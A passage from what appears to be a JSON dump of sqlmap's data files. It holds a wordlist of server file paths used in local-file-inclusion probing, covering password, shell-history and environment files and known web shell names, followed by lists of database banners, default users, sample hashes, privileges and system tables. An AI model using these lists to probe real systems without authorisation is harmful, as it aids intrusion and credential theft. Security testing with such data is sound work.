ogfiles/w3svc/inetsvn1.log\n/winnt/system32/logfiles/w3svc1/inetsvn1.log\n/winnt/system32/logfiles/w3svc2/inetsvn1.log\n/winnt/system32/logfiles/w3svc3/inetsvn1.log\n/www/apache/conf/httpd.conf\n/www/conf/httpd.conf\n/www/logs/freebsddiary-access_log\n/www/logs/freebsddiary-error.log\n/www/logs/proftpd.system.log\n/xampp/apache/bin/php.ini\n/xampp/apache/conf/httpd.conf\n/xampp/apache/logs/access.log\n/xampp/apache/logs/error.log\n/xampp/filezillaftp/filezilla server.xml\n/xampp/htdocs/aca.txt\n/xampp/htdocs/admin.php\n/xampp/htdocs/leer.txt\n/xampp/mercurymail/mercury.ini\n/xampp/mysql/data/mysql-bin.index\n/xampp/mysql/data/mysql.err\n/xampp/php/php.ini\n/xampp/phpmyadmin/config.inc.php\n/xampp/sendmail/sendmail.ini\n/xampp/sendmail/sendmail.log\n/xampp/webalizer/webalizer.conf\n\\autoexec.bat\n\\boot.ini\n\\inetpub\\wwwroot\\web.config\n\\web.config\n\\windows\\system32\\drivers\\etc\\hosts\n\\windows\\win.ini\n\n# Reference: https://repo.theoremforge.com/pentesting/tools/blob/0f1f0578739870b633c267789120d85982545a69/Uncategorized/Dump/lfiunix.txt\n\n/etc/apache2/.htpasswd\n/etc/apache/.htpasswd\n/etc/master.passwd\n/etc/muddleftpd/muddleftpd.passwd\n/etc/muddleftpd/passwd\n/etc/passwd\n/etc/passwd~\n/etc/passwd-\n/etc/pureftpd.passwd\n/etc/samba/private/smbpasswd\n/etc/samba/smbpasswd\n/etc/security/opasswd\n/etc/security/passwd\n/etc/smbpasswd\n\\Program Files\\xampp\\apache\\conf\\httpd.conf\n/usr/local/pgsql/bin/pg_passwd\n/usr/local/pgsql/data/passwd\n/usr/pkgsrc/net/pureftpd/pureftpd.passwd\n/usr/ports/contrib/pure-ftpd/pureftpd.passwd\n/usr/ports/ftp/pure-ftpd/pureftpd.passwd\n/usr/ports/net/pure-ftpd/pureftpd.passwd\n/var/log/exim_rejectlog/etc/passwd\n/etc/mysql/conf.d/old_passwords.cnf\n/etc/password.master\n/var/www/.lighttpdpassword\n/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf\n/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf\n/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf\n/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php\n/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php\n/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php\n/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini\n/Volumes/webBackup/opt/apache2/conf/httpd.conf\n/Volumes/webBackup/private/etc/httpd/httpd.conf\n/Volumes/webBackup/private/etc/httpd/httpd.conf.default\n\n# Reference: https://pastebin.com/KgPsDXjg\n\n/etc/passwd\n/etc/crontab\n/etc/hosts\n/etc/my.cnf\n/etc/.htpasswd\n/root/.bash_history\n/etc/named.conf\n/proc/self/environ\n/etc/php.ini\n/bin/php.ini\n/etc/httpd/php.ini\n/usr/lib/php.ini\n/usr/lib/php/php.ini\n/usr/local/etc/php.ini\n/usr/local/lib/php.ini\n/usr/local/php/lib/php.ini\n/usr/local/php4/lib/php.ini\n/usr/local/php5/lib/php.ini\n/usr/local/apache/conf/php.ini\n/etc/php4.4/fcgi/php.ini\n/etc/php4/apache/php.ini\n/etc/php4/apache2/php.ini\n/etc/php5/apache/php.ini\n/etc/php5/apache2/php.ini\n/etc/php/7.4/apache2/php.ini\n/etc/php/php.ini\n/usr/local/apache/conf/modsec.conf\n/var/cpanel/cpanel.config\n/proc/self/environ\n/proc/self/fd/2\n/etc/ssh/sshd_config\n/var/lib/mysql/my.cnf\n/etc/mysql/my.cnf\n/etc/my.cnf\n/etc/logrotate.d/proftpd\n/www/logs/proftpd.system.log\n/var/log/proftpd\n/etc/proftp.conf\n/etc/protpd/proftpd.conf\n/etc/vhcs2/proftpd/proftpd.conf\n/etc/proftpd/modules.conf\n/etc/vsftpd.chroot_list\n/etc/vsftpd/vsftpd.conf\n/etc/vsftpd.conf\n/etc/chrootUsers\n/etc/wu-ftpd/ftpaccess\n/etc/wu-ftpd/ftphosts\n/etc/wu-ftpd/ftpusers\n/usr/sbin/pure-config.pl\n/usr/etc/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.conf\n/usr/local/etc/pure-ftpd.conf\n/usr/local/etc/pureftpd.pdb\n/usr/local/pureftpd/etc/pureftpd.pdb\n/usr/local/pureftpd/sbin/pure-config.pl\n/usr/local/pureftpd/etc/pure-ftpd.conf\n/etc/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.pdb\n/etc/pureftpd.pdb\n/etc/pureftpd.passwd\n/etc/pure-ftpd/pureftpd.pdb\n/var/log/ftp-proxy\n/etc/logrotate.d/ftp\n/etc/ftpchroot\n/etc/ftphosts\n/etc/smbpasswd\n/etc/smb.conf\n/etc/samba/smb.conf\n/etc/samba/samba.conf\n/etc/samba/smb.conf.user\n/etc/samba/smbpasswd\n/etc/samba/smbusers\n/var/lib/pgsql/data/postgresql.conf\n/var/postgresql/db/postgresql.conf\n/etc/ipfw.conf\n/etc/firewall.rules\n/etc/ipfw.rules\n/usr/local/etc/webmin/miniserv.conf\n/etc/webmin/miniserv.conf\n/usr/local/etc/webmin/miniserv.users\n/etc/webmin/miniserv.users\n/etc/squirrelmail/config/config.php\n/etc/squirrelmail/config.php\n/etc/httpd/conf.d/squirrelmail.conf\n/usr/share/squirrelmail/config/config.php\n/private/etc/squirrelmail/config/config.php\n/srv/www/htdos/squirrelmail/config/config.php\n\n# Web shells\n\n/var/www/html/backdoor.php\n/var/www/html/b374k.php\n/var/www/html/c99.php\n/var/www/html/cmd.php\n/var/www/html/r57.php\n/var/www/html/shell.php\n/var/www/html/wso.php\n\n# Misc\n\n/app/app.js\n/app/configure.js\n/app/config/config.json\n/etc/grafana/grafana.ini\n/opt/kibana/config/kibana.yml\n/etc/kibana/kibana.yml\n/etc/elasticsearch/elasticsearch.yml\n"
  },
  {
    "path": "sqlmap/data/txt/common-outputs.txt",
    "content": "# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\n[Banners]\n\n# MySQL\n3.22.\n3.23.\n4.0.\n4.1.\n5.0.\n5.1.\n5.5.\n5.6.\n5.7.\n6.0.\n8.0.\n\n# PostgreSQL\nPostgreSQL 7.0\nPostgreSQL 7.1\nPostgreSQL 7.2\nPostgreSQL 7.3\nPostgreSQL 7.4\nPostgreSQL 8.0\nPostgreSQL 8.1\nPostgreSQL 8.2\nPostgreSQL 8.3\nPostgreSQL 8.4\nPostgreSQL 8.5\nPostgreSQL 9.0\nPostgreSQL 9.1\nPostgreSQL 9.2\nPostgreSQL 9.3\nPostgreSQL 9.4\nPostgreSQL 9.5\nPostgreSQL 9.6\nPostgreSQL 10.\nPostgreSQL 11.\nPostgreSQL 12.\nPostgreSQL 13.\n\n# Oracle\nOracle Database 9i Standard Edition Release\nOracle Database 9i Standard Edition Release 9.\nOracle Database 9i Express Edition Release\nOracle Database 9i Express Edition Release 9.\nOracle Database 9i Enterprise Edition Release\nOracle Database 9i Enterprise Edition Release 9.\nOracle Database 10g Standard Edition Release\nOracle Database 10g Standard Edition Release 10.\nOracle Database 10g Express Edition Release\nOracle Database 10g Enterprise Edition Release\nOracle Database 10g Enterprise Edition Release 10.\nOracle Database 11g Standard Edition Release\nOracle Database 11g Standard Edition Release 11.\nOracle Database 11g Express Edition Release\nOracle Database 11g Express Edition Release 11.\nOracle Database 11g Enterprise Edition Release\nOracle Database 11g Enterprise Edition Release 11.\nOracle Database 12c\n\n# Microsoft SQL Server\nMicrosoft SQL Server 7.0\nMicrosoft SQL Server 2000\nMicrosoft SQL Server 2005\nMicrosoft SQL Server 2008\nMicrosoft SQL Server 2012\nMicrosoft SQL Server 2014\nMicrosoft SQL Server 2016\nMicrosoft SQL Server 2017\nMicrosoft SQL Server 2019\n\n\n[Users]\n\n# MySQL >= 5.0\n'debian-sys-maint'@'localhost'\n'root'@'%'\n'root'@'localhost'\n\n# MySQL < 5.0\ndebian-sys-maint\nroot\n\n# PostgreSQL\npostgres\n\n# Oracle\nANONYMOUS\nCTXSYS\nDBSNMP\nDIP\nDMSYS\nEXFSYS\nMDDATA\nMDSYS\nMGMT_VIEW\nOLAPSYS\nORDPLUGINS\nORDSYS\nOUTLN\nSCOTT\nSI_INFORMTN_SCHEMA\nSYS\nSYSMAN\nSYSTEM\nTSMSYS\nWMSYS\nXDB\n\n# Microsoft SQL Server\nsa\n\n\n[Passwords]\n\n# MySQL\n*00E247AC5F9AF26AE0194B41E1E769DEE1429A29 # testpass\n\n# PostgreSQL\nmd599e5ea7a6f7c3269995cba3927fd0093 # testpass\n\n# Oracle\n2D5A0C491B634F1B # testpass\n\n# Microsoft SQL Server\n0x0100098a6200f657f7d012dfa7dc1fd1b154d4dfb8cd20596d22 # testpass\n\n\n[Privileges]\n\n# MySQL >= 5.0\nALTER\nALTER ROUTINE\nCREATE\nCREATE ROUTINE\nCREATE TEMPORARY TABLES\nCREATE USER\nCREATE VIEW\nDELETE\nDROP\nEVENT\nEXECUTE\nFILE\nINDEX\nINSERT\nLOCK TABLES\nPROCESS\nREFERENCES\nRELOAD\nREPLICATION CLIENT\nREPLICATION SLAVE\nSELECT\nSHOW DATABASES\nSHOW VIEW\nSHUTDOWN\nSUPER\nTRIGGER\nUPDATE\nUSAGE\n\n# MySQL < 5.0\nselect_priv\ninsert_priv\nupdate_priv\ndelete_priv\ncreate_priv\ndrop_priv\nreload_priv\nshutdown_priv\nprocess_priv\nfile_priv\ngrant_priv\nreferences_priv\nindex_priv\nalter_priv\nshow_db_priv\nsuper_priv\ncreate_tmp_table_priv\nlock_tables_priv\nexecute_priv\nrepl_slave_priv\nrepl_client_priv\ncreate_view_priv\nshow_view_priv\ncreate_routine_priv\nalter_routine_priv\ncreate_user_priv\n\n# PostgreSQL\ncatupd\ncreatedb\nsuper\n\n# Oracle\nADMINISTER ANY SQL TUNING SET\nADMINISTER DATABASE TRIGGER\nADMINISTER RESOURCE MANAGER\nADMINISTER SQL TUNING SET\nADVISOR\nALTER ANY CLUSTER\nALTER ANY DIMENSION\nALTER ANY EVALUATION CONTEXT\nALTER ANY INDEX\nALTER ANY INDEXTYPE\nALTER ANY LIBRARY\nALTER ANY MATERIALIZED VIEW\nALTER ANY OUTLINE\nALTER ANY PROCEDURE\nALTER ANY ROLE\nALTER ANY RULE\nALTER ANY RULE SET\nALTER ANY SEQUENCE\nALTER ANY SQL PROFILE\nALTER ANY TABLE\nALTER ANY TRIGGER\nALTER ANY TYPE\nALTER DATABASE\nALTER PROFILE\nALTER RESOURCE COST\nALTER ROLLBACK SEGMENT\nALTER SESSION\nALTER SYSTEM\nALTER TABLESPACE\nALTER USER\nANALYZE ANY\nANALYZE ANY DICTIONARY\nAUDIT ANY\nAUDIT SYSTEM\nBACKUP ANY TABLE\nBECOME USER\nCHANGE NOTIFICATION\nCOMMENT ANY TABLE\nCREATE ANY CLUSTER\nCREATE ANY CONTEXT\nCREATE ANY DIMENSION\nCREATE ANY DIRECTORY\nCREATE ANY EVALUATION CONTEXT\nCREATE ANY INDEX\nCREATE ANY INDEXTYPE\nCREATE ANY JOB\nCREATE ANY LIBRARY\nCREATE ANY MATERIALIZED VIEW\nCREATE ANY OPERATOR\nCREATE ANY OUTLINE\nCREATE ANY PROCEDURE\nCREATE ANY RULE\nCREATE ANY RULE SET\nCREATE ANY SEQUENCE\nCREATE ANY SQL PROFILE\nCREATE ANY SYNONYM\nCREATE ANY TABLE\nCREATE ANY TRIGGER\nCREATE ANY TYPE\nCREATE ANY VIEW\nCREATE CLUSTER\nCREATE DATABASE LINK\nCREATE DIMENSION\nCREATE EVALUATION CONTEXT\nCREATE EXTERNAL JOB\nCREATE INDEXTYPE\nCREATE JOB\nCREATE LIBRARY\nCREATE MATERIALIZED VIEW\nCREATE OPERATOR\nCREATE PROCEDURE\nCREATE PROFILE\nCREATE PUBLIC DATABASE LINK\nCREATE PUBLIC SYNONYM\nCREATE ROLE\nCREATE ROLLBACK SEGMENT\nCREATE RULE\nCREATE RULE SET\nCREATE SEQUENCE\nCREATE SESSION\nCREATE SYNONYM\nCREATE TABLE\nCREATE TABLESPACE\nCREATE TRIGGER\nCREATE TYPE\nCREATE USER\nCREATE VIEW\nDEBUG ANY PROCEDURE\nDEBUG CONNECT SESSION\nDELETE ANY TABLE\nDEQUEUE ANY QUEUE\nDROP ANY CLUSTER\nDROP ANY CONTEXT\nDROP ANY DIMENSION\nDROP ANY DIRECTORY\nDROP ANY EVALUATION CONTEXT\nDROP ANY INDEX\nDROP ANY INDEXTYPE\nDROP ANY LIBRARY\nDROP ANY MATERIALIZED VIEW\nDROP ANY OPERATOR\nDROP ANY OUTLINE\nDROP ANY PROCEDURE\nDROP ANY ROLE\nDROP ANY RULE\nDROP ANY RULE SET\nDROP ANY SEQUENCE\nDROP ANY SQL PROFILE\nDROP ANY SYNONYM\nDROP ANY TABLE\nDROP ANY TRIGGER\nDROP ANY TYPE\nDROP ANY VIEW\nDROP PROFILE\nDROP PUBLIC DATABASE LINK\nDROP PUBLIC SYNONYM\nDROP ROLLBACK SEGMENT\nDROP TABLESPACE\nDROP USER\nENQUEUE ANY QUEUE\nEXECUTE ANY CLASS\nEXECUTE ANY EVALUATION CONTEXT\nEXECUTE ANY INDEXTYPE\nEXECUTE ANY LIBRARY\nEXECUTE ANY OPERATOR\nEXECUTE ANY PROCEDURE\nEXECUTE ANY PROGRAM\nEXECUTE ANY RULE\nEXECUTE ANY RULE SET\nEXECUTE ANY TYPE\nEXPORT FULL DATABASE\nFLASHBACK ANY TABLE\nFORCE ANY TRANSACTION\nFORCE TRANSACTION\nGLOBAL QUERY REWRITE\nGRANT ANY OBJECT PRIVILEGE\nGRANT ANY PRIVILEGE\nGRANT ANY ROLE\nIMPORT FULL DATABASE\nINSERT ANY TABLE\nLOCK ANY TABLE\nMANAGE ANY FILE GROUP\nMANAGE ANY QUEUE\nMANAGE FILE GROUP\nMANAGE SCHEDULER\nMANAGE TABLESPACE\nMERGE ANY VIEW\nON COMMIT REFRESH\nQUERY REWRITE\nREAD ANY FILE GROUP\nRESTRICTED SESSION\nRESUMABLE\nSELECT ANY DICTIONARY\nSELECT ANY SEQUENCE\nSELECT ANY TABLE\nSELECT ANY TRANSACTION\nUNDER ANY TABLE\nUNDER ANY TYPE\nUNDER ANY VIEW\nUNLIMITED TABLESPACE\nUPDATE ANY TABLE\n\n\n[Roles]\n\n# Oracle\nAQ_ADMINISTRATOR_ROLE\nAQ_USER_ROLE\nAUTHENTICATEDUSER\nCONNECT\nCTXAPP\nDBA\nDELETE_CATALOG_ROLE\nEJBCLIENT\nEXECUTE_CATALOG_ROLE\nEXP_FULL_DATABASE\nGATHER_SYSTEM_STATISTICS\nHS_ADMIN_ROLE\nIMP_FULL_DATABASE\nJAVA_ADMIN\nJAVADEBUGPRIV\nJAVA_DEPLOY\nJAVAIDPRIV\nJAVASYSPRIV\nJAVAUSERPRIV\nLOGSTDBY_ADMINISTRATOR\nMGMT_USER\nOEM_ADVISOR\nOEM_MONITOR\nOLAP_DBA\nOLAP_USER\nRECOVERY_CATALOG_OWNER\nRESOURCE\nSCHEDULER_ADMIN\nSELECT_CATALOG_ROLE\nTABLE_ACCESSERS\nWM_ADMIN_ROLE\nXDBADMIN\nXDBWEBSERVICES\n\n\n[Databases]\n\n# MySQL\ninformation_schema\nmysql\nphpmyadmin\n\n# PostgreSQL\npg_catalog\npostgres\npublic\ntemplate0\ntemplate1\n\n# Microsoft SQL Server\nAdventureWorks\nAdventureWorksDW\nmaster\nmodel\nmsdb\nReportServer\nReportServerTempDB\ntempdb\n\n\n[Tables]\n\n# MySQL >= 5.0\nCHARACTER_SETS\nCOLLATION_CHARACTER_SET_APPLICABILITY\nCOLLATIONS\nCOLUMN_PRIVILEGES\nCOLUMNS\nENGINES\nEVENTS\nFILES\nGLOBAL_STATUS\nGLOBAL_VARIABLES\nKEY_COLUMN_USAGE\nPARTITIONS\nPLUGINS\nPROCESSLIST\nPROFILING\nREFERENTIAL_CONSTRAINTS\nROUTINES\nSCHEMA_PRIVILEGES\nSCHEMATA\nSESSION_STATUS\nSESSION_VARIABLES\nSTATISTICS\nTABLE_CONSTRAINTS\nTABLE_PRIVILEGES\nTABLES\nTRIGGERS\nUSER_PRIVILEGES\nVIEWS\n\n# MySQL\ncolumns_priv\ndb\nevent\nfunc\ngeneral_log\nhelp_category\nhelp_keyword\nhelp_relation\nhelp_topic\nhost\nndb_binlog_index\nplugin\nproc\nprocs_priv\nservers\nslow_log\ntables_priv\ntime_zone\ntime_zone_leap_second\ntime_zone_name\ntime_zone_transition\ntime_zone_transition_type\nuser\n\n# phpMyAdmin\npma_bookmark\npma_column_info\npma_designer_coords\npma_history\npma_pdf_pages\npma_relation\npma_table_coords\npma_table_info\n\n# PostgreSQL\npg_aggregate\npg_am\npg_amop\npg_amproc\npg_attrdef\npg_attribute\npg_authid\npg_auth_members\npg_cast\npg_class\npg_constraint\npg_conversion\npg_database\npg_depend\npg_description\npg_enum\npg_foreign_data_wrapper\npg_foreign_server\npg_index\npg_inherits\npg_language\npg_largeobject\npg_listener\npg_namespace\npg_opclass\npg_operator\npg_opfamily\npg_pltemplate\npg_proc\npg_rewrite\npg_shdepend\npg_shdescription\npg_statistic\npg_tablespace\npg_trigger\npg_ts_config\npg_ts_config_map\npg_ts_dict\npg_ts_parser\npg_ts_template\npg_type\npg_user_mapping\nsql_features\nsql_implementation_info\nsql_languages\nsql_packages\nsql_parts\nsql_sizing\nsql_sizing_profiles\n\n# Oracle (demo database)\nBONUS\nDEPT\nEMP\nSALGRADE\nUSERS\n\n# Microsoft SQL Server\n## Database: AdventureWorksDW\nAdventureWorksDWBuildVersion\nDatabaseLog\nDimAccount\nDimCurrency\nDimCustomer\nDimDepartmentGroup\nDimEmployee\nDimGeography\nDimOrganization\nDimProduct\nDimProductCategory\nDimProductSubcategory\nDimPromotion\nDimReseller\nDimSalesReason\nDimSalesTerritory\nDimScenario\nDimTime\nFactCurrencyRate\nFactFinance\nFactInternetSales\nFactInternetSalesReason\nFactResellerSales\nFactSalesQuota\nProspectiveBuyer\nvAssocSeqLineItems\nvAssocSeqOrders\nvDMPrep\nvTargetMail\nvTimeSeries\n\n## Database: master\nall_columns\nall_objects\nall_parameters\nall_sql_modules\nall_views\nallocation_units\nassemblies\nassembly_files\nassembly_modules\nassembly_references\nassembly_types\nasymmetric_keys\nbackup_devices\ncertificates\nCHECK_CONSTRAINTS\ncheck_constraints\nCOLUMN_DOMAIN_USAGE\nCOLUMN_PRIVILEGES\ncolumn_type_usages\ncolumn_xml_schema_collection_usages\ncolumns\nCOLUMNS\ncomputed_columns\nconfigurations\nCONSTRAINT_COLUMN_USAGE\nCONSTRAINT_TABLE_USAGE\nconversation_endpoints\nconversation_groups\ncredentials\ncrypt_properties\ndata_spaces\ndatabase_files\ndatabase_mirroring\ndatabase_mirroring_endpoints\ndatabase_mirroring_witnesses\ndatabase_permissions\ndatabase_principal_aliases\ndatabase_principals\ndatabase_recovery_status\ndatabase_role_members\ndatabases\ndefault_constraints\ndestination_data_spaces\ndm_broker_activated_tasks\ndm_broker_connections\ndm_broker_forwarded_messages\ndm_broker_queue_monitors\ndm_clr_appdomains\ndm_clr_loaded_assemblies\ndm_clr_properties\ndm_clr_tasks\ndm_db_file_space_usage\ndm_db_index_usage_stats\ndm_db_mirroring_connections\ndm_db_missing_index_details\ndm_db_missing_index_group_stats\ndm_db_missing_index_groups\ndm_db_partition_stats\ndm_db_session_space_usage\ndm_db_task_space_usage\ndm_exec_background_job_queue\ndm_exec_background_job_queue_stats\ndm_exec_cached_plans\ndm_exec_connections\ndm_exec_query_optimizer_info\ndm_exec_query_stats\ndm_exec_query_transformation_stats\ndm_exec_requests\ndm_exec_sessions\ndm_fts_active_catalogs\ndm_fts_index_population\ndm_fts_memory_buffers\ndm_fts_memory_pools\ndm_fts_population_ranges\ndm_io_backup_tapes\ndm_io_cluster_shared_drives\ndm_io_pending_io_requests\ndm_os_buffer_descriptors\ndm_os_child_instances\ndm_os_cluster_nodes\ndm_os_hosts\ndm_os_latch_stats\ndm_os_loaded_modules\ndm_os_memory_allocations\ndm_os_memory_cache_clock_hands\ndm_os_memory_cache_counters\ndm_os_memory_cache_entries\ndm_os_memory_cache_hash_tables\ndm_os_memory_clerks\ndm_os_memory_objects\ndm_os_memory_pools\ndm_os_performance_counters\ndm_os_ring_buffers\ndm_os_schedulers\ndm_os_stacks\ndm_os_sublatches\ndm_os_sys_info\ndm_os_tasks\ndm_os_threads\ndm_os_virtual_address_dump\ndm_os_wait_stats\ndm_os_waiting_tasks\ndm_os_worker_local_storage\ndm_os_workers\ndm_qn_subscriptions\ndm_repl_articles\ndm_repl_schemas\ndm_repl_tranhash\ndm_repl_traninfo\ndm_tran_active_snapshot_database_transactions\ndm_tran_active_transactions\ndm_tran_current_snapshot\ndm_tran_current_transaction\ndm_tran_database_transactions\ndm_tran_locks\ndm_tran_session_transactions\ndm_tran_top_version_generators\ndm_tran_transactions_snapshot\ndm_tran_version_store\nDOMAIN_CONSTRAINTS\nDOMAINS\nendpoint_webmethods\nendpoints\nevent_notification_event_types\nevent_notifications\nevents\nextended_procedures\nextended_properties\nfilegroups\nforeign_key_columns\nforeign_keys\nfulltext_catalogs\nfulltext_document_types\nfulltext_index_catalog_usages\nfulltext_index_columns\nfulltext_indexes\nfulltext_languages\nhttp_endpoints\nidentity_columns\nindex_columns\nindexes\ninternal_tables\nKEY_COLUMN_USAGE\nkey_constraints\nkey_encryptions\nlinked_logins\nlogin_token\nmaster_files\nmaster_key_passwords\nmessage_type_xml_schema_collection_usages\nmessages\nmodule_assembly_usages\nMSreplication_options\nnumbered_procedure_parameters\nnumbered_procedures\nobjects\nopenkeys\nparameter_type_usages\nparameter_xml_schema_collection_usages\nparameters\nPARAMETERS\npartition_functions\npartition_parameters\npartition_range_values\npartition_schemes\npartitions\nplan_guides\nprocedures\nREFERENTIAL_CONSTRAINTS\nremote_logins\nremote_service_bindings\nroutes\nROUTINE_COLUMNS\nROUTINES\nschemas\nSCHEMATA\nsecurable_classes\nserver_assembly_modules\nserver_event_notifications\nserver_events\nserver_permissions\nserver_principals\nserver_role_members\nserver_sql_modules\nserver_trigger_events\nserver_triggers\nservers\nservice_broker_endpoints\nservice_contract_message_usages\nservice_contract_usages\nservice_contracts\nservice_message_types\nservice_queue_usages\nservice_queues\nservices\nsoap_endpoints\nspt_fallback_db\nspt_fallback_dev\nspt_fallback_usg\nspt_monitor\nspt_values\nsql_dependencies\nsql_logins\nsql_modules\nstats\nstats_columns\nsymmetric_keys\nsynonyms\nsysaltfiles\nsyscacheobjects\nsyscharsets\nsyscolumns\nsyscomments\nsysconfigures\nsysconstraints\nsyscurconfigs\nsyscursorcolumns\nsyscursorrefs\nsyscursors\nsyscursortables\nsysdatabases\nsysdepends\nsysdevices\nsysfilegroups\nsysfiles\nsysforeignkeys\nsysfulltextcatalogs\nsysindexes\nsysindexkeys\nsyslanguages\nsyslockinfo\nsyslogins\nsysmembers\nsysmessages\nsysobjects\nsysoledbusers\nsysopentapes\nsysperfinfo\nsyspermissions\nsysprocesses\nsysprotects\nsysreferences\nsysremotelogins\nsyssegments\nsysservers\nsystem_columns\nsystem_components_surface_area_configuration\nsystem_internals_allocation_units\nsystem_internals_partition_columns\nsystem_internals_partitions\nsystem_objects\nsystem_parameters\nsystem_sql_modules\nsystem_views\nsystypes\nsysusers\nTABLE_CONSTRAINTS\nTABLE_PRIVILEGES\nTABLES\ntables\ntcp_endpoints\ntrace_categories\ntrace_columns\ntrace_event_bindings\ntrace_events\ntrace_subclass_values\ntraces\ntransmission_queue\ntrigger_events\ntriggers\ntype_assembly_usages\ntypes\nuser_token\nvia_endpoints\nVIEW_COLUMN_USAGE\nVIEW_TABLE_USAGE\nviews\nVIEWS\nxml_indexes\nxml_schema_attributes\nxml_schema_collections\nxml_schema_component_placements\nxml_schema_components\nxml_schema_elements\nxml_schema_facets\nxml_schema_model_groups\nxml_schema_namespaces\nxml_schema_types\nxml_schema_wildcard_namespaces\nxml_schema_wildcards\n\n## Database: msdb\nbackupfile\nbackupfilegroup\nbackupmediafamily\nbackupmediaset\nbackupset\nlog_shipping_monitor_alert\nlog_shipping_monitor_error_detail\nlog_shipping_monitor_history_detail\nlog_shipping_monitor_primary\nlog_shipping_monitor_secondary\nlog_shipping_primaries\nlog_shipping_primary_databases\nlog_shipping_primary_secondaries\nlog_shipping_secondaries\nlog_shipping_secondary\nlog_shipping_secondary_databases\nlogmarkhistory\nMSdatatype_mappings\nMSdbms\nMSdbms_datatype\nMSdbms_datatype_mapping\nMSdbms_map\nrestorefile\nrestorefilegroup\nrestorehistory\nsqlagent_info\nsuspect_pages\nsysalerts\nsyscachedcredentials\nsyscategories\nsysdatatypemappings\nsysdbmaintplan_databases\nsysdbmaintplan_history\nsysdbmaintplan_jobs\nsysdbmaintplans\nsysdownloadlist\nsysdtscategories\nsysdtslog90\nsysdtspackagefolders90\nsysdtspackagelog\nsysdtspackages\nsysdtspackages90\nsysdtssteplog\nsysdtstasklog\nsysjobactivity\nsysjobhistory\nsysjobs\nsysjobs_view\nsysjobschedules\nsysjobservers\nsysjobsteps\nsysjobstepslogs\nsysmail_account\nsysmail_allitems\nsysmail_attachments\nsysmail_attachments_transfer\nsysmail_configuration\nsysmail_event_log\nsysmail_faileditems\nsysmail_log\nsysmail_mailattachments\nsysmail_mailitems\nsysmail_principalprofile\nsysmail_profile\nsysmail_profileaccount\nsysmail_query_transfer\nsysmail_send_retries\nsysmail_sentitems\nsysmail_server\nsysmail_servertype\nsysmail_unsentitems\nsysmaintplan_log\nsysmaintplan_logdetail\nsysmaintplan_plans\nsysmaintplan_subplans\nsysnotifications\nsysoperators\nsysoriginatingservers\nsysoriginatingservers_view\nsysproxies\nsysproxylogin\nsysproxyloginsubsystem_view\nsysproxysubsystem\nsysschedules\nsysschedules_localserver_view\nsyssessions\nsyssubsystems\nsystargetservergroupmembers\nsystargetservergroups\nsystargetservers\nsystargetservers_view\nsystaskids\n\n## Database: AdventureWorks\nAddress\nAddressType\nAWBuildVersion\nBillOfMaterials\nContact\nContactCreditCard\nContactType\nCountryRegion\nCountryRegionCurrency\nCreditCard\nCulture\nCurrency\nCurrencyRate\nCustomer\nCustomerAddress\nDatabaseLog\nDepartment\nDocument\nEmployee\nEmployeeAddress\nEmployeeDepartmentHistory\nEmployeePayHistory\nErrorLog\nIllustration\nIndividual\nJobCandidate\nLocation\nProduct\nProductCategory\nProductCostHistory\nProductDescription\nProductDocument\nProductInventory\nProductListPriceHistory\nProductModel\nProductModelIllustration\nProductModelProductDescriptionCulture\nProductPhoto\nProductProductPhoto\nProductReview\nProductSubcategory\nProductVendor\nPurchaseOrderDetail\nPurchaseOrderHeader\nSalesOrderDetail\nSalesOrderHeader\nSalesOrderHeaderSalesReason\nSalesPerson\nSalesPersonQuotaHistory\nSalesReason\nSalesTaxRate\nSalesTerritory\nSalesTerritoryHistory\nScrapReason\nShift\nShipMethod\nShoppingCartItem\nSpecialOffer\nSpecialOfferProduct\nStateProvince\nStore\nStoreContact\nTransactionHistory\nTransactionHistoryArchive\nUnitMeasure\nvAdditionalContactInfo\nvEmployee\nvEmployeeDepartment\nvEmployeeDepartmentHistory\nVendor\nVendorAddress\nVendorContact\nvIndividualCustomer\nvIndividualDemographics\nvJobCandidate\nvJobCandidateEducation\nvJobCandidateEmployment\nvProductAndDescription\nvProductModelCatalogDescription\nvProductModelInstructions\nvSalesPerson\nvSalesPersonSalesByFiscalYears\nvStateProvinceCountryRegion\nvStoreWithDemographics\nvVendor\nWorkOrder\nWorkOrderRouting\n\n\n[Columns]\n\n# MySQL\n## Table: mysql.user\nAlter_priv\nAlter_routine_priv\nCreate_priv\nCreate_routine_priv\nCreate_tmp_table_priv\nCreate_user_priv\nCreate_view_priv\nDelete_priv\nDrop_priv\nEvent_priv\nExecute_priv\nFile_priv\nGrant_priv\nHost\nIndex_priv\nInsert_priv\nLock_tables_priv\nmax_connections\nmax_questions\nmax_updates\nmax_user_connections\nPassword\nProcess_priv\nReferences_priv\nReload_priv\nRepl_client_priv\nRepl_slave_priv\nSelect_priv\nShow_db_priv\nShow_view_priv\nShutdown_priv\nssl_cipher\nssl_type\nSuper_priv\nTrigger_priv\nUpdate_priv\nUser\nx509_issuer\nx509_subject\n\n# Oracle (types)\nBINARY_INTEGER\nBLOB\nBOOLEAN\nCHAR\nCLOB\nDATE\nINTERVAL\nLONG\nMLSLABEL\nNCHAR\nNCLOB\nNUMBER\nNVARCHAR2\nRAW\nROWID\nTIMESTAMP\nVARCHAR\nVARCHAR2\nXMLType\n\n# MySQL (types)\nbigint\nblob\nchar\ndate\ndatetime\ndecimal\ndouble\nenum\nfloat\nint\nset\nsmallint\ntext\ntime\ntinyint\nvarchar\nyear\n\n# Microsoft SQL Server (types)\nbigint\nbinary\nbit\nchar\ncursor\ndate\ndatetime\ndatetime2\ndatetimeoffset\ndecimal\nfloat\nimage\nint\nmoney\nnchar\nntext\nnumeric\nnvarchar\nreal\nsmalldatetime\nsmallint\nsmallmoney\nsql_variant\ntable\ntext\ntime\ntimestamp\ntinyint\nuniqueidentifier\nvarbinary\nvarchar\nxml\n\n# PostgreSQL (types)\nbigint\nbigserial\nboolean\nbpchar\nbytea\ncharacter\ndate\ndecimal\ndouble precision\nint4\ninteger\ninterval\nmoney\nnumeric\nreal\nserial\nsmallint\ntext\ntime\ntimestamp\n"
  },
